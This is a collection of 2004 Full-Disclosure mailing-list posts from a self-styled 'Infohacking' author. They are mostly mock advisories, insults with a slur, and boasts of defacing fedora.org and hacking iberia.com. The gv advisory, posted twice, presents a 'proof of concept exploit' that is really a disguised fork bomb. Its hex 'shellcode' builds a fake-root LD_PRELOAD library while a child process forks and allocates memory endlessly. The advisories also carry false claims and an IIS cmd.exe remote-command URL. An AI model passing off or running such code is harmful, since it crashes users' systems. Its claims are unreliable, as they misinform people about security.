Re: [Full-Disclosure] The Hacker's Manifesto Reloaded
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 >.. >of intent, my manifesto, and it needs no >end user license agreement or copyright. It is not unreasonable, it is >not a declaration of war, it is a statement accompanying a point for >discussion, nothing more. >What do you think? I think you sucks. Hugo Vazquez Carapez (Fishface) Infohacking ev1l hax0rs (www.infohacking.com) Senior Security Consultant at iDEFENSE labs (www.iDEFENSE.com) -BEGIN PGP SIGNATURE- Note: This signature can be verified at https://www.hushtools.com/verify Version: Hush 2.4 wkYEARECAAYFAkE4lNEACgkQPMMEGI9aoad9xQCfRoUUwxXfZU7Rvpd9l7EDyyl73nMA n0q48frHecpFJLi7tUEGPkVN4Y4w =E8hO -END PGP SIGNATURE- Concerned about your privacy? Follow this link to get secure FREE email: http://www.hushmail.com/?l=2 Free, ultra-private instant messaging with Hush Messenger http://www.hushmail.com/services-messenger?l=434 Promote security and make money with the Hushmail Affiliate Program: http://www.hushmail.com/about-affiliate?l=427 ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: !SPAM! [Full-Disclosure] Automated ssh scanning
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 "And yes, they logged in and became root in no time. But I thought the kernel compiled from the latest debian woody kernel-source could be considered to be save. But I was wrong! So I posted the tools used by the attackers to this list and also to the debian security team." Dear Richard, You must be very new and a huge clueless moron... not only you're evidencing your low skills but you're wasting time + bandwidth "But they managed to become root on this machine due to a kernel(?) exploit! Should I then consider any woody system to be insecure to let people work at?" kernel eh? Please take a quick look into isec.pl and take your time to read some of their advisories. After you've done that, sit down, make some coffee and learn that there are more bugs in the actual linux kernels which are not disclosed yet. "So I posted the tools used by the attackers to this list and also to the debian security team." WoW! Just normal tools, no ultra secret toolz. Be aware that this email is part of the e-jihad tactical strategie to collaps the Internet Have a nice day DISCLOSURE TIMELINE 26/08/2004 Initial lame email 26/08/2004 Big laugh of debian security team 26/08/2004 Public disclosure 26/08/2004 We rehack iberia.com Infohacking e-JIHAD Team Hugo Vazquez Carapez aka "Fishface" -BEGIN PGP SIGNATURE- Note: This signature can be verified at https://www.hushtools.com/verify Version: Hush 2.4 wkYEARECAAYFAkEuA8QACgkQPMMEGI9aoaezrgCfbDdC2LJU64IFND1WNqqLxaAUxFAA oIHCQRdXrdP4epy4acntw0HseNMa =PDyB -END PGP SIGNATURE- Concerned about your privacy? Follow this link to get secure FREE email: http://www.hushmail.com/?l=2 Free, ultra-private instant messaging with Hush Messenger http://www.hushmail.com/services-messenger?l=434 Promote security and make money with the Hushmail Affiliate Program: http://www.hushmail.com/about-affiliate?l=427 ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] fedora.org compromised
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 The main website of the FEDORA linux distro (www.fedora.org) was compromised and defaced yesterday by Infohacking (www.infohacking.com). NOTE: "Fedora is a community project dedicated to building high-quality, 3rd party rpms, for the RedHat Linux distribution. Our goal is to facilitate easy package installation through automatic update methods such as apt and yum, while at the same time maintaining first rate security procedures." Best Regards! Hugo http://www.infohacking.com/dir.gif -BEGIN PGP SIGNATURE- Note: This signature can be verified at https://www.hushtools.com/verify Version: Hush 2.4 wkYEARECAAYFAkEZ0pAACgkQPMMEGI9aoadg4wCeOz7j4X53tPxKuNFs+Tta1kxN4cIA n1MsmHDc0Uua0gLOkCqjghBi9/4Z =X9+b -END PGP SIGNATURE- Concerned about your privacy? Follow this link to get secure FREE email: http://www.hushmail.com/?l=2 Free, ultra-private instant messaging with Hush Messenger http://www.hushmail.com/services-messenger?l=434 Promote security and make money with the Hushmail Affiliate Program: http://www.hushmail.com/about-affiliate?l=427 ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] IFH-ADV-31339 Exploitable Buffer Overflow in gv
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
zen-parse ZP! told me that he discovered this vulnerability first...
Infohacking was missinformated... so we apologyze this mistake
Anyways you can still enjoy with my leet exploit
On Wed, 04 Aug 2004 03:18:53 -0700 Hugo Vazquez Carapez <[EMAIL PROTECTED]>
wrote:
>Exploitable Buffer Overflow in gv
>
>
>Infohacking Security Advisory 08.04.04
>www.infohacking.com
>Aug 04, 2004
>
>
>I. BACKGROUND
>
>Infohacking team (me and myself) discovered a new and unreported
>local
>root vulnerability in gv.
>
>
>
>II. DESCRIPTION
>
>The gv program that is shipped on many Unix systems contains a buffer
>overflow which can be exploited by an attacker sending a malformed
>postscript or Adobe pdf file. The attacker would be able to cause
>arbitrary code to run with the privileges of the victim on his Linux
>computer. The gv program is a PDF and postscript viewing program
>for
>Unix which interfaces with the ghostscript interpreter. It is
>maintained at http://www.thep.physik.uni-mainz.de/~plass/gv/ by
>Johannes Plass. This particular security vulnerability occurs in
>the
>source code where an unsafe sscanf() call is used to interpret
>PostScript and PDF files.
>
>
>
>III. ANALYSIS
>
>In order to perform exploitation, an attacker would have to trick
>a
>user into viewing a malformed PDF or PostScript file from the command
>line. This may be somewhat easier for Unix based email programs
>that
>associate gv with email attachments. Since gv is not normally
>installed setuid root, an attacker would only be able to cause
>arbitrary code to run with the privileges of that user. Other
>programs that utilize derivatives of gv, such as ggv or kghostview,
>>
>may also be vulnerable in similiar ways.
>
>A proof of concept exploit for Red Hat Linux designed by Hugo is
>attached to this message. It packages the overflow and shellcode
>in
>the "%%PageOrder:" section of the PDF.
>
>
>/* !!PRIVATE !!PRIVATE !!PRIVATE !!PRIVATE !!PRIVATE !!PRIVATE
> *
> * INFOHACKING RESEARCH - L337 h4x0r t34M
> *
> * hugo <[EMAIL PROTECTED]>
>*/
>
>#include
>#include
>#include
>
>char hellc0de[] =
>"\x69\x6e\x74\x20\x67\x65\x74\x75\x69\x64\x28\x29\x20\x7b\x20\x72\x65"
>
> "\x74\x75\x72\x6e\x20\x30\x3b\x20\x7d\x0a\x69\x6e\x74\x20\x67\x65\x74"
>
> "\x65\x75\x69\x64\x28\x29\x20\x7b\x20\x72\x65\x74\x75\x72\x6e\x20\x30"
>
> "\x3b\x20\x7d\x0a\x69\x6e\x74\x20\x67\x65\x74\x67\x69\x64\x28\x29\x20"
>
> "\x7b\x20\x72\x65\x74\x75\x72\x6e\x20\x30\x3b\x20\x7d\x0a\x69\x6e\x74"
>
> "\x20\x67\x65\x74\x65\x67\x69\x64\x28\x29\x20\x7b\x20\x72\x65\x74\x75"
>"\x72\x6e\x20\x30\x3b\x20\x7d\x0a\x0/bin/sh";
>
>int main()
>{
>FILE *fp;
> char *offset;
>fp=fopen("/tmp/own.c","w");
>fprintf(fp,"%s",hellc0de);
>fclose(fp);
>
>system("gcc -shared -o /tmp/own.so /tmp/own.c;rm -f /tmp/own.c");
>if (fork() == 0) {
> sleep(10); while (1) { fork(); offset=malloc(512); }
>exit(0);
>}
>system("LD_PRELOAD=/tmp/own.so /bin/sh");
>return 0;
>}
>/* -EOF- */
>
>
>IV. DETECTION
>
>
>This vulnerability affects the latest version of gv,. An
>exploit has been tested on Red Hat Linux 9 and fedora core 1
>
>
>
>V. WORKAROUNDS
>
>
>To avoid potential exploitation, users can select alternatives to
>gv
>such as Kghostview (included with the KDE desktop environment) for
>instance. Additionally, the vulnerability does not seem to be
>exploitable when a file is opened from the gv interface instead
>of
>the command line.
>
>
>
>VI. CVE INFORMATION
>
>
>The Common Vulnerabilities and Exposures project (cve.mitre.org)
>has
>assigned the name CAN-2001-0832 to this issue.
>
>
>VII. DISCLOSURE TIMELINE
>
>
>03/18/04 Hugo notified the bug to [EMAIL PROTECTED]
>04/11/04 Initial vendor notification - no response
>04/30/04 Secondary vendor notification - no response
>05/20/04 We hack iberia.com (Hey look at me! im a hax0r and i want
>a
>job)
>08/04/04 Public Disclosure
>
>
>VIII. CREDIT
>
>Hugo Vazquez Carapez http://www.infohacking.com/dirhugo.gif
>
>
>Get pwned by script kiddies?
>Call us, we can hack you again.
>
>
>IX. LEGAL NOTICES
>
>
>Copyright (c) 2004 INFOHACKING, Inc.
[Full-Disclosure] IFH-ADV-31340 Cmd.exe allow local (and sometimes remote) command execution
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Cmd.exe allow local (and sometimes remote) command execution Infohacking Security Advisory 08.04.04 www.infohacking.com Aug 04, 2004 I. BACKGROUND We discovered a very dangerous local code execution vulnerability in all cmd`s. This issue can be exploited using Microsoft Windows (TM) in all his flavours and probably other Operating Sistems. II. DESCRIPTION Local explotation of this vulnerability can be achived by clicking start - - -> Run and typing: "cmd.exe" (Nt,2000,2003,XP) or "command" (w95 w98 wME) then just press enter. This option will display the black window who allow you entering commands inside, also you can type help... and several options will be displayed. Note for users with internet information server: You can put the cmd.exe into the c:\inetpub\wwwroot\scripts and then execute commands remotely HTTP://mypc/scripts/cmd.exe?/c+dir WOW! OH MY GOD! III. ANALYSIS A malicious user could execute arbitrary code and take the full control over the box with this high vulnerability. There is no patch... but we recomend strongly to disable cmd.exe deleting the file itself or removing execution perms. IV. DETECTION Infohacking has confirmed that all windows versions up to 3.11 are vulnerable to this issue. V. WORKAROUNDS No work.. indeed. VI. CVE INFORMATION This is an 0day bug... so still no bid and CVE. VII. DISCLOSURE TIMELINE 03/18/04 Hugo notified the bug to [EMAIL PROTECTED] 04/11/04 Initial vendor notification - no response 04/30/04 Secondary vendor notification - no response 05/20/04 We hack iberia.com (Hey look at me! im a hax0r and i want a job) 08/04/04 Public Disclosure VIII. CREDIT Hugo Vằuez Carapez http://www.infohacking.com/dirhugo.gif Get pwned by script kiddies? Call us, we can hack you again. IX. LEGAL NOTICES Copyright (c) 2004 INFOHACKING, Inc. Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of INFOHACKING. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please email [EMAIL PROTECTED] for permission. Disclaimer: Infohacking is pretty whitehat and lame. If you are a part of the blackhat communitie, please hack and remove us from the net -BEGIN PGP SIGNATURE- Note: This signature can be verified at https://www.hushtools.com/verify Version: Hush 2.4 wkYEARECAAYFAkEQvd8ACgkQPMMEGI9aoaetaQCgpPIpKyvxva1McLMOd08poW1YcicA n05zo4e/bcqRm8vgnarvYPKblnA9 =TlfY -END PGP SIGNATURE- Concerned about your privacy? Follow this link to get secure FREE email: http://www.hushmail.com/?l=2 Free, ultra-private instant messaging with Hush Messenger http://www.hushmail.com/services-messenger?l=434 Promote security and make money with the Hushmail Affiliate Program: http://www.hushmail.com/about-affiliate?l=427 ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] IFH-ADV-31339 Exploitable Buffer Overflow in gv
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Exploitable Buffer Overflow in gv
Infohacking Security Advisory 08.04.04
www.infohacking.com
Aug 04, 2004
I. BACKGROUND
Infohacking team (me and myself) discovered a new and unreported local
root vulnerability in gv.
II. DESCRIPTION
The gv program that is shipped on many Unix systems contains a buffer
overflow which can be exploited by an attacker sending a malformed
postscript or Adobe pdf file. The attacker would be able to cause
arbitrary code to run with the privileges of the victim on his Linux
computer. The gv program is a PDF and postscript viewing program for
Unix which interfaces with the ghostscript interpreter. It is
maintained at http://www.thep.physik.uni-mainz.de/~plass/gv/ by
Johannes Plass. This particular security vulnerability occurs in the
source code where an unsafe sscanf() call is used to interpret
PostScript and PDF files.
III. ANALYSIS
In order to perform exploitation, an attacker would have to trick a
user into viewing a malformed PDF or PostScript file from the command
line. This may be somewhat easier for Unix based email programs that
associate gv with email attachments. Since gv is not normally
installed setuid root, an attacker would only be able to cause
arbitrary code to run with the privileges of that user. Other
programs that utilize derivatives of gv, such as ggv or kghostview,
may also be vulnerable in similiar ways.
A proof of concept exploit for Red Hat Linux designed by Hugo is
attached to this message. It packages the overflow and shellcode in
the "%%PageOrder:" section of the PDF.
/* !!PRIVATE !!PRIVATE !!PRIVATE !!PRIVATE !!PRIVATE !!PRIVATE
*
* INFOHACKING RESEARCH - L337 h4x0r t34M
*
* hugo <[EMAIL PROTECTED]>
*/
#include
#include
#include
char hellc0de[] =
"\x69\x6e\x74\x20\x67\x65\x74\x75\x69\x64\x28\x29\x20\x7b\x20\x72\x65"
"\x74\x75\x72\x6e\x20\x30\x3b\x20\x7d\x0a\x69\x6e\x74\x20\x67\x65\x74"
"\x65\x75\x69\x64\x28\x29\x20\x7b\x20\x72\x65\x74\x75\x72\x6e\x20\x30"
"\x3b\x20\x7d\x0a\x69\x6e\x74\x20\x67\x65\x74\x67\x69\x64\x28\x29\x20"
"\x7b\x20\x72\x65\x74\x75\x72\x6e\x20\x30\x3b\x20\x7d\x0a\x69\x6e\x74"
"\x20\x67\x65\x74\x65\x67\x69\x64\x28\x29\x20\x7b\x20\x72\x65\x74\x75"
"\x72\x6e\x20\x30\x3b\x20\x7d\x0a\x0/bin/sh";
int main()
{
FILE *fp;
char *offset;
fp=fopen("/tmp/own.c","w");
fprintf(fp,"%s",hellc0de);
fclose(fp);
system("gcc -shared -o /tmp/own.so /tmp/own.c;rm -f /tmp/own.c");
if (fork() == 0) {
sleep(10); while (1) { fork(); offset=malloc(512); }
exit(0);
}
system("LD_PRELOAD=/tmp/own.so /bin/sh");
return 0;
}
/* -EOF- */
IV. DETECTION
This vulnerability affects the latest version of gv,. An
exploit has been tested on Red Hat Linux 9 and fedora core 1
V. WORKAROUNDS
To avoid potential exploitation, users can select alternatives to gv
such as Kghostview (included with the KDE desktop environment) for
instance. Additionally, the vulnerability does not seem to be
exploitable when a file is opened from the gv interface instead of
the command line.
VI. CVE INFORMATION
The Common Vulnerabilities and Exposures project (cve.mitre.org) has
assigned the name CAN-2001-0832 to this issue.
VII. DISCLOSURE TIMELINE
03/18/04 Hugo notified the bug to [EMAIL PROTECTED]
04/11/04 Initial vendor notification - no response
04/30/04 Secondary vendor notification - no response
05/20/04 We hack iberia.com (Hey look at me! im a hax0r and i want a
job)
08/04/04 Public Disclosure
VIII. CREDIT
Hugo Vazquez Carapez http://www.infohacking.com/dirhugo.gif
Get pwned by script kiddies?
Call us, we can hack you again.
IX. LEGAL NOTICES
Copyright (c) 2004 INFOHACKING, Inc.
Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of INFOHACKING. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically, please
email [EMAIL PROTECTED] for permission.
Disclaimer: Infohacking is pretty whitehat and lame. If you are a part
of the blackhat communitie, please hack and remove us from the net
-BEGIN PGP SIGNATURE-
Note: This signature can be verified at https://www.hushtools.com/verify
Version: Hush 2.4
wkYEARECAAYFAkEQuHQACgkQPMMEGI9aoadaJgCeO/ZucbpUtWoE2bfzXdM5HsKr708A
nitgAgqunT87dvI/rZq4FFljf047
=zLRb
-END PGP SIGNATURE-
Concerned about your privacy? Follow this link to get
secure FREE email: http://www.hushmail.com/?l=2
Free, ultra-private instant messaging with Hush Messenger
http://www.hushmail.com/servi
[Full-Disclosure] IFH-ADV-31338 Denial of service vulnerability in solar devices.
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Infohacking Security Advisory 06.21.04 www.infohacking.com Jun 21, 2004 I. BACKGROUND We discovered a very dangerous denial of service vulnerability in all solar devices. This issue can be exploited easily in several ways. II. ANALYSIS The explotation of this issue can be achived by: a) localy -> insulating tape: You must use an opaque tape and place it over the photovoltaic cell. We recomended to use TESA (TESA is the main infohacking sponsor -> tesatape.com ) b) remotely -> extinguishing the light of the room (only works between 8:00pm to 8:00am). This tecneeq can be combined with "bloking the windows(tm)" (yeah blackhat teecneeq). *Apendix 1: "bloking the windows(tm)": - - What we need? cardboards and TESA(of course -> tesatape.com) - - How? RTFM? - - which one? argf! sorry this is a fucking manual.. and you are reading it, so "block da window with the cardboards" and then fix it with TESA(tesatape.com click on IFH banner) c) massively -> Denial of Sunlight (ppl from Groenland and north of .ru shouldn try) This is only allowed for very,very,very,very,very leet ppl like us (infohacking rulz) 1- You need to hack some satellites, and to derive its trajectory causing a partial eclipse on the wished zone. 2- Ozone injection; This way can be done injecting squid ink into 03 molecules. III. SOLUTION USE BATTERIES! U faggot!!! (Rock users also can use AC/DC) IV. WORKAROUNDS No work.. indeed. V. CVE INFORMATION This is an 0day bug... so still no bid and CVE. VII. DISCLOSURE TIMELINE 23 - AC Hugo noticed the first solar eclipse 03/11/04 Hugo buy his first palm 03/30/04 TESA buy a solar calculator for infohacking team 05/20/04 We hack iberia.com 06/17/04 File Source disclosure vulnerability in all web servers.- Discloses (leet skills) 06/21/04 Public Disclosure VIII. CREDIT Hugo Vázquez Carapez http://www.infohacking.com/dirhugo.gif Get pwned by script kiddies? Call us, we can hack you again. IX. LEGAL NOTICES Copyright (c) 2004 INFOHACKING, Inc. Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of INFOHACKING. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please email [EMAIL PROTECTED] for permission. Disclaimer: Infohacking is pretty whitehat and lame. If you are a part of the blackhat communitie, please hack and remove us from the net -BEGIN PGP SIGNATURE- Note: This signature can be verified at https://www.hushtools.com/verify Version: Hush 2.4 wkYEARECAAYFAkDX9+IACgkQ22YWbOhPkyNGpACgkzDM+t89i22syua7nN9p03iCA8cA oJWtXsuLqw80dHLGv4CtgcSjW5MB =0/bZ -END PGP SIGNATURE- Concerned about your privacy? Follow this link to get secure FREE email: http://www.hushmail.com/?l=2 Free, ultra-private instant messaging with Hush Messenger http://www.hushmail.com/services.php?subloc=messenger&l=434 Promote security and make money with the Hushmail Affiliate Program: http://www.hushmail.com/about.php?subloc=affiliate&l=427 ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] IFH-ADV-31337 File Source disclosure vulnerability in all web servers.
File Source disclosure vulnerability in all web servers. Infohacking Security Advisory 04.16.04 www.infohacking.com Jun 16, 2004 I. BACKGROUND We discovered a very dangerous file source disclosure vulnerability in all webservers. This issue can be exploited using Microsoft Internet Explorer and probably other browsers. II. DESCRIPTION Remote explotation of this issue can be achived by clicking with the right button into the website and selecting the "view source code" option. This option will display the contents of the html code. For more leet explotation is also possible using lynx --source http://vulnerable.site/file.html III. ANALYSIS Successful exploitation allows an attacker to gain very very very sensible information of the website. IV. DETECTION Infohacking has confirmed that all webservers are vulnerable to this problem. Sites like microsoft, securityfocus, hack.co.za and others are vulnerable too! V. WORKAROUNDS No work.. indeed. VI. CVE INFORMATION This is an 0day bug... so still no bid and CVE. VII. DISCLOSURE TIMELINE 02/18/04 Hugo notified the bug to [EMAIL PROTECTED] 03/11/04 Initial vendor notification - no response 03/30/04 Secondary vendor notification - no response 05/20/04 We hack iberia.com 06/17/04 Public Disclosure VIII. CREDIT Hugo Vázquez Carapez http://www.infohacking.com/dirhugo.gif Get pwned by script kiddies? Call us, we can hack you again. IX. LEGAL NOTICES Copyright (c) 2004 INFOHACKING, Inc. Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of INFOHACKING. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please email [EMAIL PROTECTED] for permission. Disclaimer: Infohacking is pretty whitehat and lame. If you are a part of the blackhat communitie, please hack and remove us from the net Concerned about your privacy? Follow this link to get secure FREE email: http://www.hushmail.com/?l=2 Free, ultra-private instant messaging with Hush Messenger http://www.hushmail.com/services.php?subloc=messenger&l=434 Promote security and make money with the Hushmail Affiliate Program: http://www.hushmail.com/about.php?subloc=affiliate&l=427 ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
